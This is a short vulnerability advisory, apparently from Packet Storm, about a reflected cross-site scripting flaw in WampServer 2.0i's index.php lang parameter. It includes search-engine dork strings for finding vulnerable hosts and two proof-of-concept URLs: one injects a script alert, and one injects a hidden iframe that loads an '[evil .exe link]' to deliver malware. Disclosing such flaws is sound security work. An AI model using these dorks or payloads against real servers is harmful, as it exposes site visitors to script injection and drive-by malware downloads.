WampServer version 2.0i suffers from a cross site scripting vulnerability.
60a31928a82776a22e2b05479fb6e0060a35a6f0ab65ff1622120b9b8fa2afc4----------------------------------------------------------------
Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability
Summary: WampServer - Apache, PHP, MySQL on Windows
Product web page: http://www.wampserver.com
Current version: 2.0i
Vulnerability discovered by Gjoko "LiquidWorm" Krstic
Zero Science Lab - http://www.zeroscience.mk
liquidworm gmail com
26.01.2010
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4926.php
----------------------------------------------------------------
Dork:
"WampServer - Donate - Anaska"
"WAMPSERVER Homepage"
PoC:
http://[site]/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
http://[site]/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://[evil .exe link]%22%3E%3C/iframe%3E
//EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed